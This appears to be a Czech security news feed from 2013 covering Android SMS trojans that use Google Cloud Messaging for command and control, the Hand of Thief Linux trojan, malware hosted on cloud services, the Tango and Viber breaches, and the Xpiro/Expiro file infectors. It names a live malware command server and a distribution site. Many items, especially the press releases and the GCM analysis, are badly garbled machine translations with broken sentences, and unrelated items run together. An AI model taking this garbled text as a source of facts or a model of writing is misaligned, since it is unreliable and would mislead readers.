Naprostá většina nově vznikajícího malwaru stále míří na nejvýnosnější Windows. Rostoucí počet vzorků škodlivých programů v Androidu nicméně dává tušit, že nastupující generace kyberzločinců se nyní začíná zaměřovat na smartphony, jejichž prodeje začaly převyšovat prodeje nových počítačů.
V první polovině tohoto roku počet shromážděných vzorků škodlivého kódu poprvé pokořil hranici 100 000. Což je více než za celý loňský rok, kdy Kaspersky Lab nasbírala 76 000 vzorků. Přesto však míra nakažení smartphonu zůstává poměrně nízká. Například při červnovém třídenním pátrání po Obadu zaznamenal Kaspersky 0,015 % pokusů o instalaci ze všech zaznamenaných malwarů.
Míra nakažení bude pravděpodobně stoupat s tím, jak se vyvinou další distribuční kanály kromě primárního Google Play a několika dalších, které jsou v provozu v současnosti.
Zapněte jakékoli zařízení iOS do zabezpečené mobilní platby řešení
Publikováno dne 16. srpna 2013. Mobil | Zabezpečení | Viry
SecureNet platební systémy zahájena Mobilní PayOS , nejnovější mobilní platební technologie zmocňuje obchodníky všech velikostí, které promění jakoukoli iOS mobilní zařízení do zabezpečené mobilní platební řešení. Mobilní PayOS umožňuje podnikatelům rychle a snadno přijímat platby a spravovat jejich podnikání on-the-go. Securenet mobilního řešení zahrnuje zdarma mobilní aplikace a plně šifrované čtečku karet, k dispozici pro mobilní iOS dnes, a brzy Android. SecureNet nabízí 24 / 7. živá, US-založené podporu a umožňuje rychlé a snadné pro obchodníky začít používat mobilní PayOS. Poskytovat podnikům více obchodních příležitostí, Mobilní PayOS dává obchodníkům možnost přijímat platby debetní a kreditní kartou a sledovat platby v hotovosti všude v USA, pomocí libovolného mobilního iOS zařízení. Přizpůsobitelné zásob, daňové, obchodní reporting a řízení personálu nastavení umožňuje majitelům firem nastavit svůj mobilní sklad přesně tak, jak si přejí. Securenet mobilní PayOS umožňuje majitelům podniků s více zaměstnanci a míst rychle zvládnout, synchronizaci a sdílení zásoby a obchodní nastavení na více mobilních zařízení a PayOS spát zdravě vědomím jejich data jsou zálohována v cloudu. In-app zprávy o prodeji a Business Analytics umožňují obchodníkům rychle získat celkový přehled o jejich podnikání, kde jejich obchodní požadavky. aplikace pomáhá urychlit proces vypůjčování s inteligentním zásob třídění, jedné z kohoutku prodeje vstupenek míst, přizpůsobit zvratu hodnot a Okamžitý e-mail s příjmy transakce geo-umístění. Mobilní PayOS umožňuje také obchodníci a zaměstnanci zahájit úplné i částečné, bezproblémové náhrady přímo z aplikace. Prostřednictvím jediného, full-service obchodní účet, můžete Securenet obchodníci bezpečně přijmout místě prodeje, online a mobilní platby jako jejich podnikání roste a potřebuje změnit. SecureNet škálovatelnou obchodní účty umožňují podnikatelům řídit všechny aspekty své činnosti z jednoho místa a odstranit účetních bolesti hlavy s komplexní zprávy a konsolidované účetní závěrky, které dělají usmíření hračkou. "Jako nové prodejní kanály se objeví, zákazníci mají neomezené možnosti zvolit si, kdy a kde chtějí nakupovat. Představením nových obchodních příležitostí a urychlení cash flow, mobilní PayOS umožňuje obchodníkům všech velikostí spravovat a rozvíjet jejich podnikání on-the-go, "řekl Brent Warrington, generální ředitel SecureNet. "Ať point-of-sale, eCommerce nebo mobilní, musí obchodníci vyvíjejí a rozšířit své podnikání splnit zákazníkům, kde jsou nákupy. Jak karta bez přítomnosti karty a současnost světy sblížit a nutí podniky k posunu směrem k Omni-kanálový obchodní model, bude SecureNet nadále vyvíjet inovativní řešení platební technologie, které pomáhají obchodníci růst jejich podnikání. "
Secure robustní Android tablet pro vládu
Publikováno dne 15. srpna 2013 Mobil | Viry
Becrypt oznámila nové technologické partnerství s Getac poskytnout první zabezpečené Android Tablet řešení vhodné pro vojenské, obrany a vládě a veřejném sektoru trhy podle zodolněné zařízení Getac je.
Platforma založená na Android 4.1, je dodáván na plně robustní Getac tablety s vylepšenými bezpečnostními prvky, a bude poskytovat více bezpečný systém, ze kterého podporuje širokou škálu zakázkových aplikací, které vládní, vojenské a obranné trhy mohou používat s důvěrou. Peter Molyneux, prezident Getac Velké Británii řekl: "Naše robustní Android tablety spolu s Becrypt Špičkové možnosti zabezpečení nabízí výkonné řešení na trh. Becrypt má inovativní přístup k řešení bezpečnostních výzev, aby akreditované a flexibilní řešení. Společně naši zákazníci ve vládě, mohou vojenské, obranné a veřejného sektoru nám věřit poskytovat nejvyšší úroveň bezpečnosti, spolu s spolehlivé, robustní technologii k ochraně svých důvěrných a citlivých dat a řízení produktivity a výkonu. " Becrypt spolupracuje s Getac poskytovat bezpečnostní platformy jak pro Android a Windows 8 tablet (Becrypt již má CESG akreditovaný řešení pro tablety Windows 8), včetně šifrování zařízení, systém zpevnění, periferní kontrolu a centralizovanou správu, které významně zlepší schopnost ovládat zařízení, vynucení zásad zabezpečení, a poskytují auditní stopy a podávání zpráv při současném snížení podpory a údržby režii. Dr. Bernard Parsons, generální ředitel společnosti Becrypt, řekl: "Tablet přijetí roste bezpečnostní vědomé trhy a jsme hrdí na to, pracovat s Getac rozvíjet inovativní ještě praktická řešení, která chrání data, na různých tvarových faktorů, pro dnešek a pro budoucnost. Naše budoucnost připravené strategie se zaměřuje na dálkové nasazení a centralizovanou správu zařízení, která zajistí stejnou vysoký výkon a spolehlivost, které zákazníci očekávají od své notebooky s bonusem větší bezpečnost a snažší umožněn na základě nejnovějších mobilních technologií. "
GCM ve škodlivých příloh
14.8.2013 Mobil | Viry
Android OS nabízí zajímavou službu známou jako Google Cloud Messaging nebo VOM. Tato služba umožňuje malé (do 4 KB) zprávy, které mají být odeslány na server Google ze svých mobilních zařízení ve formátu JSON. Tyto zprávy mohou obsahovat žádná strukturovaná data, jako jsou například odkazy, Informace o inzerci, nebo příkazy.
Aby bylo možné používat tuto službu, musíte nejprve dostat vývojář jedinečné ID pro jeho aplikace, která bude použita k registraci aplikace s GCM. Po registraci může vývojář posílat data do všech zařízení, na kterém jsou nainstalovány registrované aplikace, nebo jen některé z nich.
Tato služba se používá k určení souřadnic ukradených telefonů, vzdálené nastavení telefonu, vysílají zprávy o vydání nových herních úrovní, nové produkty, a další.
Bylo by překvapivé, samozřejmě, pokud autoři virů se nesnažila využít příležitostí, které tuto službu. Zjistili jsme několik škodlivé programy, které používají GCM jako C & C.
Trojan-SMS.AndroidOS.FakeInst.a To je jeden z nejrozšířenějších hrozeb zaměřených na Android. Kaspersky Lab zjištěn v průběhu 4.800.000 instalátory pro tento trojan, a jen za poslední rok, Kaspersky Mobile Security (KMS) zablokoval více než 160.000 pokusů o instalaci.
Trojan mohou posílat textové zprávy na prémiová čísla, mazat příchozí textové zprávy, vytvářet zkratky na nebezpečné stránky a zobrazení oznámení reklamě jiné škodlivé programy, které se šíří pod rouškou užitečných aplikací či her.
Trojan je zaregistrován v systému GCM: Trojan můžete posílat placené SMS zprávy, když obdrží odpovídající příkazy: Trojan Fakelnst.a byla zjištěna ve více než 130 zemích světa. Jeho hlavní cíle jsou Rusko, Ukrajina, Kazachstán, a Uzbekistán.
Trojan-SMS.AndroidOS.Agent.ao Tento Trojan je převlečen za porno aplikace, ale ve skutečnosti se skládá z pouhých dvou snímků. Hlavním cílem tohoto Trojan je poslat prémiových textových zpráv. Kaspersky Lab zjištěn více než 300 instalátory pro tento trojan.
Tento Trojan používá GCM pro získání aktualizací:
Dále se také používá GCM vydávat příkazy posílat textové zprávy a vytvářet oznámení s informací nebo reklamní obsah v oznamovací oblasti:
Celkem KMS blokován přes 6000 pokusů o instalaci Trojan-SMS.AndroidOS.Agent.ao. Tento Trojan se zaměřuje především mobilní zařízení ve Velké Británii, kde byly zjištěny 90% všech infekcí pokoušel. Tato hrozba byla také zjištěna ve Švýcarsku, Íránu, Keni a Jižní Afriky.
Trojan-SMS.AndroidOS.OpFake.a Tato hrozba je klasický příklad Trojan SMS. Je množily v APK, pod rouškou množství aplikací, her, atd. Kaspersky Lab zjištěn více než milion různých instalátorů pro tento trojan.
Jakmile infiltroval mobilní zařízení, první věc, kterou udělá, je to Trojan kontaktujte jeho C & C: \ To pak registruje GCM: GCM a Trojan je C & C mají stejnou hodnost, pokud jde o odesílání příkazů.
Trojan má poměrně širokou škálu funkcí:
odesílání zpráv prémiové SMS na zadané číslo odesílání textových zpráv (typicky s odkazem na sobě nebo jinému ohrožení) na konkrétní číslo, typicky na čísla v seznamu kontaktů provádění self-aktualizace krást textové zprávy mazání příchozí textové zprávy, které splňují kritéria stanovená v C & C odcizení kontaktů nahrazovat C & C nebo GCM čísla zastavení nebo restartování svou činnost Pozoruhodné je, že při instalaci určitými modifikacemi tohoto Trojan, Android 4.2 varuje uživatele, že se jedná v podstatě o nebezpečnou aplikaci. Bohužel, to se nestane pro všechny úpravy. Společnost Kaspersky Lab zjistila tuto Trojan v 97 zemích. To je nejvíce často detekovány v Rusku, na Ukrajině, v Kazachstánu, Ázerbájdžánu, Běloruska a Uzbekistánu. KMS blokován přes 60.000 pokusí nainstalovat OpFake.a v těchto zemích.
Více než 1.000 pokusy instalace byly blokovány v Itálii a Německu.
Backdoor.AndroidOS.Maxit.a Kaspersky Lab poprvé zjištěn tento backdoor zpět na konci roku 2011 a nové úpravy byly vyneseny od té doby. V současné době existuje více než 40 variant tohoto ohrožení. Všechny tyto změny jsou velmi podobné navzájem, aplikace se otevře webové stránky s hrami, zatímco škodlivé operace se provádí v pozadí. První věc, kterou backdoor stanoví udělat, je shromažďovat informace o telefonu a SIM karty, včetně telefonního čísla a mobilního operátora. Všechna tato data se vkládají do androidproject.imaxter.net C & C. To je server, který spravuje všechny trojské primárních funkcí. Dále je ohrožení registrován GCM, který se pak používá jako dodatečný zdroj povelů: Backdoor je funkce se zaměřují především na tajně manipulace s funkcí textových zpráv, jako jsou odesílání, mazání a přesměrování příchozích zpráv. Kromě toho může být hrozbou také nainstalovat zkratky aniž by uživatel věděl, a nezávisle na otevřené webové stránky. To může také iniciovat telefonní hovory, i když tato akce vyžaduje potvrzení od uživatele.
Tato hrozba se šíří prostřednictvím internetových stránek http://www.momozaap.com/ .
Během uplynulého roku, KMS blokován téměř 500 pokusů instalace tohoto backdoor. Tento škodlivý program je detekován nejčastěji v Malajsii, a také byl zaznamenán v Thajsku, na Filipínách a Barmě.
Mimochodem, tato hrozba je kód zahrnuje Malajsie telefonní číslo. Toto číslo se nepoužívá nikde, ale uživatelé se zlými úmysly pravděpodobně chtít použít jako dodatečný zdroj povelů.
Trojan-SMS.AndroidOS.Agent.az Společnost Kaspersky Lab má Trojan-SMS.AndroidOS.Agent.az na jeho radaru od května 2012. Je to shell aplikace pro vietnamské porno stránkách, které také posílá textové zprávy prémiové číslo. V současné době již více než 1000 změn těchto aplikací byla zjištěna a v uplynulém roce sám KMS zablokovala více než 1500 pokusů instalací.
Trojan registruje GCM po uvádí: To pak otevře webové stránky s pornografickým videa: Dále pošle SMS na prémiové číslo.
Trojan používá GCM přijímat určité zprávy a přidat je do mobilního telefonu oznamovací části: Zřejmě protože Trojan jasně zaměřuje na uživatele ve Vietnamu (celý text se zobrazí uživateli, je v Vietnamese), naše testovací telefon s ruským číslem nikdy nedostal žádné zprávy. Zkušenosti však ukázaly, že dříve nebo později bude tento typ reklamy bude zaslán jinými škodlivými programy maskované jako užitečné aplikace nebo hry.
Tento Trojan byl zjištěn především ve Vietnamu, i když společnost Kaspersky Lab zjištěn také to v Rusku, Itálii, Indonésii a Malajsii.
Závěr I přesto, že současný počet škodlivých programů využívajících GCM je stále relativně nízká, některé z nich jsou velmi rozšířené. Tyto programy jsou převládající v některých zemích západní Evropy, SNS a Asie.
Není pochyb o tom, GCM je užitečná služba pro legitimní softwarové vývojáře. Ale autoři virů se pomocí Google Cloud Messaging jako další C & C pro své trojské koně. Kromě toho je provádění příkazů přijatých od GCM provádí GCM systému, a to je možné zablokovat přímo na infikované zařízení. Jediným způsobem, jak snížit tento kanál se od autoři virů je blokovat vývojáře účty s ID spojených s registrací škodlivých programů.
Kaspersky Lab již hlášena VOM ID nalezené být spojován s škodlivých programů na Google.
Trojský kůň pro linuxové distribuce za 2000 dolarů
Ruští zločinci prodávají trojského koně, který dokáže útočit na linuxové distribuce. Zájemcům ho nabízejí za 2 000 dolarů (přibližně 39 000 korun).
Virus
Je snad načase, aby se virů začali obávat i uživatelé Linuxu? Malware pro uživatele Linuxu obvykle nepředstavuje problém. Pokud už se nějaký útok směřovaný na linuxové distribuce jednou za čas objeví, většinou se jedná pouze o pokusy zvědavého programátora, které brzy upadnou v zapomnění. Dobrým příkladem je například Snasko rootkit z roku 2012.
Nyní však bezpečností společnost RSA objevila malware s názvem Hand of Thief, který krade data z linuxových systémů. Podle výzkumníků z RSA funguje na všech patnáct testovaných distribucí a v osmi prostředích.
Součástí malwaru je funkce „form-grabing“, zaměřená na Firefox, Chrome a linuxové prohlížeče (Chromium, Aurora a IceWeasel), funkce zaznamenává i relace HTTPS a shromažďuje ukradená data v databázi SQL.
„Malware je na Linuxu neobvyklý, a to z dobrých důvodů. V porovnání s Windows má Linux menší uživatelskou základnu, což výrazně snižuje počet obětí a tím i případné zisky pro podvodníky,“ uvedla Limor Kessemová, expertka na kyberšpionáž z RSA. „Linux je také open source a to znamená, že všechna slabá místa jsou komunitou opravená celkem rychle.“
Prodejci malwaru naznačují, že by časem mohli software změnit na bankovní malware. Jeho cena by poté stoupla na 3000 dolarů (přibližně 58 000 korun) a dalších 550 dolarů (10 600) by stály aktualizace.
Jak vážně by uživatelé Linuxu měli tuto hrozbu brát? Podle Kessemové se příliš obávat nemusí. Dva tisíce dolarů je podle ní příliš vysoká částka, a to i za standardní malware na Windows, který se dotkne významně většího procenta uživatelů. Kdo by si také koupil program, který se dotkne 0,5 procent desktopů, když si může koupit program zaměřující zbývajících 94 % za třikrát nižší cenu?
„Bez možnosti rozšířit malware tak široce jako je možné ve Windows, se zdá jeho cena přehnaná,“ myslí si Kessemová.
Cloudové služby jsou zneužívány k šíření malwaru
Je hlášen výrazný nárůst případů, kdy autoři malwaru využívají služby jako Google Code jako distribučního kanálu.
IT | Viry | Kriminalita
Až dosud bylo obvyklé, že programátoři škodlivých programů své „produkty“ šířili z vlastních webů. Nyní je ale pozorován jejich masový přechod na komerční hostovací služby a cloudové služby, přinejmenším podle vystoupení bezpečnostních výzkumníků na konferenci Black Hat, která proběhla minulý týden.
Je to zřejmě způsobeno tím, jak se bezpečnostní řešení stále lépe dokáží vyrovnat s nebezpečnými servery. Ať u jejich detekcí či následným využíváním blacklistů, seznamů jednoznačně identifikovaných nebezpečných adres. Využívání komerčních serverů, jejichž adresy nelze jednoduše zakázat, není trend nový, je pozorováno víc než dva roky, ale podle bezpečnostních specialistů nyní prudce roste.
Nejčastěji vlastníci serverů nedokáží správně kontrolovat obsah, který poskytují. Jak říká Michael Sutton, viceprezident pro výzkum společnosti ZScaler, která nabízí bezpečnostní cloudové služby pro korporace: „Umístit na takové servery škodlivý kód je potom relativně snadné.“
U závadného obsahu šířeného z běžné komerční adresy je podstatně pravděpodobnější, že projde tradičními korporátními zabezpečeními. Výrobci také jen těžko budou na blacklist umisťovat legitimní hostovací společnosti, což současně vede k tomu, že škodlivý obsah na nich zůstává o to déle.
Sutton uvedl příklady z nedávné minulosti, kdy útočníci nahráli a distribuovali škodlivý kód pomocí služeb DropBox a Google Code. Na blogu firmy ZScaler je seznam téměř čtyřiceti závadných souborů hostovaných na webu Google Code, který jinak primárně nabízí nástroje pro softwarové vývojáře. Příklady nekorektních souborů na DropBoxu již neplatí a podle blogu již byly zřejmě odstraněny.
„Zpráva pro správce IT je jasná – nevěřte slepě doménám, které se zdají být bezpečné. Útočníci dnes sázejí na hostovací služby. Kdysi používali vlastní servery. Později infikovali obsah legitimních společností. Dnes využívají hostovacích společností. Za hostování malwaru již nemusí platit a mnohem méně jim hrozí zařazení do blacklistu.“
Ke stejným závěrům dochází i Firehost, provozovatel cloudových hostovacích služeb pro korporace. Podle jeho kvartální bezpečnostní analýzy výrazně vzrostl počet útoků typu SQL injection, directory traversal attacks a dalších, které přicházejí zevnitř sítí cloudových provozovatelů. Ti často nedostatečně prověřují nové zákazníky, což umožňuje vytvářet účty na základě falešných identit. Ty jsou potom často zneužívaný k spouštění a správě mohutných botnetů, které běží na cloudové infrastruktuře.
Firehost uvádí, že v druhém čtvrtletí roku 2013 filtrovací systém IP adres, který chrání jeho zákazníky, zablokoval přibližně 1,2 milionů jednotlivých útoků (do tohoto údaje nejsou započítány opakování téhož útoku). A z nich značná část pocházela právě z různých cloudových služeb.
Vzestup sofistikovaného malwaru
Publikováno dne 25.07.2013 Viry
Nedávné Enterprise Strategy Group (ESG) výzkumná studie zaměřená na pokročilé Malware Protection a detekci. Studie odhalila, že podnikové organizace jsou vidět nárůst sofistikovanějšího malware a dělat to strategickou prioritou pro přidání další vrstvy zabezpečení koncových bodů a chránit své organizace proti pokročilých zero-day a polymorfní ohrožení běžně používané pro cílené útoky.
Na základě svého průzkumu 315 Severní Americe na bázi IT bezpečnostních odborníků, kteří pracují na podnikové úrovni organizace (1000 a více zaměstnanci), ESG našel většina respondentů viděli uptick ve více sofistikovaných a cílené útoky škodlivého softwaru během posledních 24 měsíců. Nicméně , 62 procent dotazovaných organizací řekl, zabezpečení koncových bodů software není účinné pro odhalování zero-day a / nebo polymorfní malware, který opustí jejich zranitelnost vůči těmto útokům. "Jako kybernetické útoky stále důmyslnější, zabezpečení IT odborníci si uvědomují, že spoléhání se na jediný jedna vrstva zabezpečení koncových bodů nestačí. Každý koncový bod je třeba více vrstev detekce malwaru s cílem zajistit úplnou ochranu, "řekl Marcin Kleczynski, generální ředitel společnosti Malwarebytes. "Skutečností je, že většina antivirových produktů bude chybět devět z deseti zero-day malware hrozby, a když odstupňovaný přístup bloky pokročilé hrozby, které tradiční antivirové skenery nemusí odhalit." Kromě toho studie zjistila, že nejpravděpodobnější cestou, pro malware útoku, a důvod pro úspěšných útoků škodlivého softwaru, byl nedostatek uživatelské znalosti o bezpečnostních rizicích z internetu. IT bezpečnost dotazovaní odborníci věří, zaměstnanec kliknutím na infikované URL vyslaného do e-mailu byl s největší pravděpodobností vektor malware infiltrovat jejich organizace. Další vhodné cesty pro malware ohrozit organizace systému včetně zaměstnanců otevření infikovaného e-mailu a nevědomky kliknutím na infikované URL při surfování na webu. "Pokud jde o řízení rizika škodlivého Podniky by se nejlépe zavedením odstupňovaný přístup pomocí proaktivní a reaktivní obranné linie prostřednictvím svých sítí. Antivirový software hraje klíčovou roli při ochraně organizace, ale to by nemělo být jedinou metodou, jak zabránit malware útoky, "řekl Jon Oltsik, senior hlavní analytik společnosti ESG. "Navíc, někdy největší chyba v organizaci, je počítač uživatele. . Vzhledem k tomu, zaměstnanecké akce mohou výrazně ovlivnit počítačové bezpečnosti, vzdělávání zaměstnanců na potenciální hrozby a jak se jim vyhnout by se měly stát prioritou " Kromě odhalení těchto zjištění, studie také ukázala, že:
29 procent dotazovaných organizací, které utrpěly úspěšný útok malwaru věří, že rostoucí využívání sociálních sítí je odpovědný za těmito útoky V průměru trvá 57 procent respondentů hodin rozpoznat, že IT majetku, byl napaden malware a 19 procent dny 74 procent podniků se zvýšily jejich bezpečnostní rozpočtu v průběhu posledních 24 měsíců v přímé reakci na složitější škodlivého softwaru 62 procent respondentů věří, že jejich host-based bezpečnostní software není účinné pro odhalování Zero Day a / nebo polymorfní hrozby 85 procent IT bezpečnostních odborníků, vzhledem k tomu všechno, co vědí o kybernetické bezpečnosti, se obávají o nějaký druh masivní kybernetické útoky, které by mohly ovlivnit kritické infrastruktury, ekonomiky, a / nebo národní bezpečnosti 66 procent z US-založené respondentů nevěří, federální vláda USA je na tom dost pomoci soukromého sektoru vyrovnat se s aktuální kybernetické bezpečnosti a hrozeb.
Tango messaging aplikace pirát - "miliony" uživatelských informace unikly 23 červenec 2013 23:03 PDT Mobil | Hacking | Viry Populární messaging aplikace Tango byl hacknut - a hacker skupina Syrská armáda Elektronická (SEA) tvrdí, že přístup "miliony" osobních informací uživatelů, stahování 1,5 terabytů informací včetně soukromých telefonních čísel, seznamy kontaktů a e-mailů.
Aplikace používá více než 100 milionů lidí. Tango potvrdil porušení přes jeho zdroj Twitter, řka: "Tango zažil kybernetické vniknutí, která vyústila v neoprávněnému přístupu k některým údajům. Pracujeme na zvýšení našich bezpečnostních systémů. "Společnost také omluvil a řekl:" "Upřímně se omlouváme za nepříjemnosti, které toto porušení mohlo způsobit našim členům."
"Hodně z informací obsažených v databázích, které byly staženy bude doručena syrské vlády," skupina tvrdila v příspěvku na svých internetových stránkách. "Obsah databáze milionů app počtu uživatelů telefonů a kontaktů a jejich emailsMore než 1,5 TB denní zálohování serverů sítě byl úspěšně stažen."
Hackeři údajně získal přístup díky použití Tango ze zastaralé verze WordPress, podle E Hacking News.
Skupina také cílené aplikaci pro chat Viber tento týden, i když tvrdí, že společnost jen malé systémy byly ovlivněny.
"Dnes Podpora Viber místo bylo poškozeno po zaměstnanec Viber bohužel padl za oběť útoku phishing e-mail," uvedla společnost v prohlášení. "Phishing povolen přístup do dvou menších systémů: zákaznická podpora panelových a podpora administrace systému. Informace z jednoho z těchto systémů bylo zveřejněno na znetvořil stránce. "
V příspěvku na jeho oficiálních stránkách, SEA tvrdil, že "pirát dnes webové stránky a databáze izraelsko-based" Viber "app SEA stáhnout některé z app databází a poté, co jsme získali přístup do některých systémů této aplikace bylo jasné, že pro nás propuse této aplikace je špionáž a sledování jeho uživatelů SEA hacknutý stránku podpory z Viber aplikace a odeslat snímky z jednoho z app systémů kromě app administrátory jména / telefonních čísel. "
Příspěvek Tango messaging aplikace pirát - "miliony" uživatelských informace unikly poprvé objevil na Žijeme zabezpečení.
Bezpečnostní experti antivirové společnosti Bitdefender odhalili škodlivé programy maskované za regulérní aplikace. Ty zneužívají kritickou bezpečnostní chybu operačního systému Android, kterou mohou počítačoví piráti využít k ovládání počítačových tabletů a chytrých telefonů na dálku.
Viry se ukrývají v aplikacích Rose Wedding Cake Game a Pirates Island Mahjong Free. „Mezi uživateli Androidu jsou tyto programy poměrně populární. První má více než 10 000 stažení a druhý přes 5000,“ uvedl bezpečnostní expert z Bitdefenderu Bogdan Botezatu.
Podle něj však není důvod k panice, protože zatím nebyl zaznamenán případ, kdy by trhlina byla těmito aplikacemi zneužita. Navíc telefony a tablety s nainstalovanou bezpečnostní aktualizací dokážou podvodné programy odhalit.
Zneužita může být jakákoliv aplikace „Oprava již byla poskytnuta našim partnerům. Někteří výrobci, jako například Samsung, již aktualizaci pro svá zařízení vydali,“ uvedla již dříve pro server ZD Net produktová manažerka Androidu Gina Sciglianová.
Právě rychlost je podle bezpečnostních expertů to nejdůležitější, co ovlivní, v jaké míře bude chyba zneužívána. Doposud nebyl evidován podle tvůrců Androidu evidován ani jeden případ.
Uživatelé by tak měli kontrolovat aktualizace u výrobců svých zařízení. „Lze předpokládat, že dostupnost oprav se bude velmi lišit podle toho, o jakého výrobce se jedná,“ podotkl Jeff Forristal, šéf bezpečnostní společnosti Bluebox, která chybu v Androidu odhalila.
Chyba se týká přístrojů s Androidem, které přišly na trh v posledních čtyřech letech. Útočník může s její pomocí ovládat přístroj stejně, jako by jej držel v ruce. Může telefonovat, posílat textové zprávy, ale například i prohlížet uložená hesla. Na dálku dokonce může klidně zapnout i zabudovanou webkameru.
Zranitelnost umožňuje počítačovým pirátům proměnit originální programy v trojské koně, aniž by to byl uživatel schopen při instalaci poznat. Takto zneužita může být prakticky jakákoliv aplikace, upozornily servery VentureBeat a SecurityWeek.
První Rozšířené Virus Cross infekce
23.července 2013 Virus
Poté, co byl v zapomnění na chvíli, rodina Xpiro souborů škodlivin je zpět s třeskem-a tentokrát s některými notoricky známých schopností. Nejen, že nová varianta nakazit 32bitové soubory, ale také rozšířila svou působnost infekce 64bitových souborů. Infekce jsou cross-platformní (32-bit Xpiro varianta může infikovat 64bitové spustitelný soubor, a naopak) a trvalé povahy. Navíc tento virus rovněž posílilo své informace krást schopnosti přidáním Firefox a Chrome prohlížeče ke sledování relací.
Cross-infekce a vytrvalost I když jsme viděli křížové škodlivin v minulosti, Xpiro je první rozšířený rodina škodlivin, které implementuje tuto funkci. Tato nová varianta může infikovat spustitelné soubory z následujících architektur: Intel 386 (32-bit) Intel 64 (64-bit) * AMD64 (64-bit) Tvůrci Xpiro se snaží infikovat větší množství počítačů. Jsou nezůstane kámen na kameni při svých pokusech se zavedením této cross-nákazu schopnosti s vytrvalostí.
Tradičně souborů škodlivin bylo známo, šíří tím, že nakazí ostatní spustitelné soubory, aniž by se starat o vytrvalosti. Tato varianta používá vychytralý techniku k dosažení obou. Za prvé, je to výčet všech win32 služby a snaží se infikovat servisní soubory. Potom následuje všechny soubory (odkaz. Lnk) na pracovní ploše uživatele a start menu složky infikovat cílové soubory. To vybere tyto soubory, protože mají nejvyšší pravděpodobnost, že budou řízeny systémem či uživatelem, když je počítač poprvé začíná, a zůstává tedy přetrvávající na následné restartování. Nakonec se infikuje všechny spustitelné soubory z disků C do Z v případě, že disk je pevné, odnímatelné, nebo mapovat.
* V Intel64 bitové soubory jsou nakaženi nové varianty, ale kvůli chybě ve svém kódu, to skýtá poškozené soubory. Symantec detekuje a opravy těchto souborů jejich správného stavu.
Lepší informace krást Konečným cílem Xpiro bylo ukrást informace z infikovaného hostitele. Cíl zůstává stejný, kromě toho, že je stealthier teď. Když Xpiro infikuje běží na počítači, je nyní také přidává Firefox nebo Chrome rozšíření, kromě napadení spustitelné soubory. Rozšíření pro Firefox, skrytá, ale rozšíření Chrome s názvem "Google Chrome 1.0", takže to může projít jako čistý rozšíření a maskovat svou přítomnost. Rozšíření pro Firefox, například, můžete provádět následující akce: Skrýt příponu přítomnost Dolní zabezpečení prohlížeče Spy na aktivitě uživatelů internetu Steal záznamy Přesměrování prohlížeče na předdefinované adresy URL Po instalaci, při otevření nové instance aplikace Firefox a je vidět, že nový add-on byl nainstalován, ale přípona nemůže být nalezen v seznamu přípon.
Rozšíření Xpiro skrývá se od rozšíření seznamu, které ukazují stejný počet rozšíření před a po infekci. To také snižuje zabezpečení prohlížeče úpravou konfiguraci prohlížeče.
Když se uživatel pokusí aktualizovat prohlížeč nebo rozšíření prohlížeče, budou aktualizace neproběhne, protože Xpiro nahradí URL aktualizace s 127.0.0.1, což je lokální IP adresu. Xpiro to dělá, aby se zabránilo jakékoliv změny v konfiguraci, které mohou případně vystavit sebe jako malware.
Skryté přípony zakazuje mnoho bezpečnostních upozornění normálně zobrazené v prohlížeči varovat uživatele. Rozšíření také zakáže některé Bezpečného prohlížení vlastnosti, které by jinak poskytují phishingem ochranu uživatele při aktivaci.
Xpiro sleduje všechny aktivity HTTP v prohlížeči a nahrává na vzdálený server. To pak stáhne následující seznamy z předdefinovaných serverů: Cílová URL Přesměrování adresy URL Když uživatel přejde do jedné cílové URL v seznamu, rozšíření přesměruje prohlížeč na odpovídající URL z přesměrování seznamu. Přesměrování URL může být inzertní strana nebo strana, která stáhne další malware.
V Xpiro útočníci přešli Hrozba funkčnost perzistentní, stealthier, a co je nejdůležitější, aby cross-infikují spustitelné soubory na různých platformách. Ostatní infikuje rodiny lze očekávat, že následovat a přidejte propracovanou funkcionalitu svém arzenálu, aby byl silnější a životaschopné napříč různými platformami. Symantec je však zavazuje chránit vaše data a informace proti takové pokročilé hrozbami. Symantec detekuje novou variantu rodiny Xpiro jako W32.Xpiro.D a W64.Xpiro a také opravy poškozených souborů. Zákazníci Symantec se doporučuje, aby definice virů aktuální.
Soubor infikuje EXPIRO hity USA, krade přihlašovací údaje FTP 21.07.2013 Hacking | Zranitelnosti | Viry Neobvyklý útok byl spatřen ve volné přírodě, pomocí nečekanou kombinaci hrozeb. Tento útok používá využívat sestavy (zejména Java a PDF exploit) dodat souborů škodlivin na zranitelné systémy. Je zajímavé, že tyto soubory škodlivin mít k dispozici postupy úniku informací, což je chování, není obvykle možné nalézt mezi soubory škodlivin. Jedná malware jsou součástí rodiny PE_EXPIRO, že soubor škodlivin byl poprvé spatřen spatřen v roce 2010. . Kromě standardních rutin souborů infekce, varianty viděné v tomto útoku také rutiny úniku informací, neobvyklé rutina souborů škodlivin infekce řetěz zní asi takto:
Uživatel je lákal na škodlivé stránky, která obsahuje exploit kit. Několik exploity jsou používány, jeden z nich je exploit Java (detekován jako JAVA_EXPLOIT.ZC), který používá CVE-2012-1723. Další chyba Java (CVE-2013-1493) je také používán. PDF exploit je také používán s škodlivého souboru PDF detekované jako TROJ_PIDIEF.JXM. Ať už se používá exploit, konečný výsledek je stejný: matka infikuje soubor (ať už PE_EXPIRO.JX-O, PE_EXPIRO.QW-O, nebo PE64-EXPIRO-O pro 64-bitové systémy) do postiženého systému. Jakmile se na postiženém systému, hledá. EXE soubory v systému infikovat. Všechny složky ve všech dostupných jednotek (odnímatelné, sdílené síťové) jsou podrobeny vyhledávání. Infikované soubory jsou detekovány jako PE_EXPIRO.JX. To krade systémové a uživatelské informace, jako je například Windows Product ID, disku, sériové číslo, verze pro Windows a pověření přihlášení uživatele. To také krade uložené FTP pověření od klienta FileZilla FTP. Ukradené informace jsou pak uloženy v. DLL soubor a nahrát na různé velení a řízení (C & C) servery. Zde je diagram z výše uvedeného řetězce, pomocí exploit Java jako příklad:
Asi 70% z celkového počtu infekcí je ve Spojených státech. Je možné, že tento útok měl krást informace od organizací nebo ohrozit webových stránek, jako zvláštní zaměření na FTP pověření naznačuje buď bylo možné. Kombinace použitých hrozeb je velmi neobvyklé a naznačuje, že tento útok nebyl off-the- . police útok, který se používá běžně dostupné počítačové trestné činnosti nástroje Autor: Rhena Inocencio, Threat Response inženýr Trend Micro. Doplňující analýza Dexter, Kai Yu a Jethro Bacani.
AutoRun. Reloaded
15.6.2013 Viry
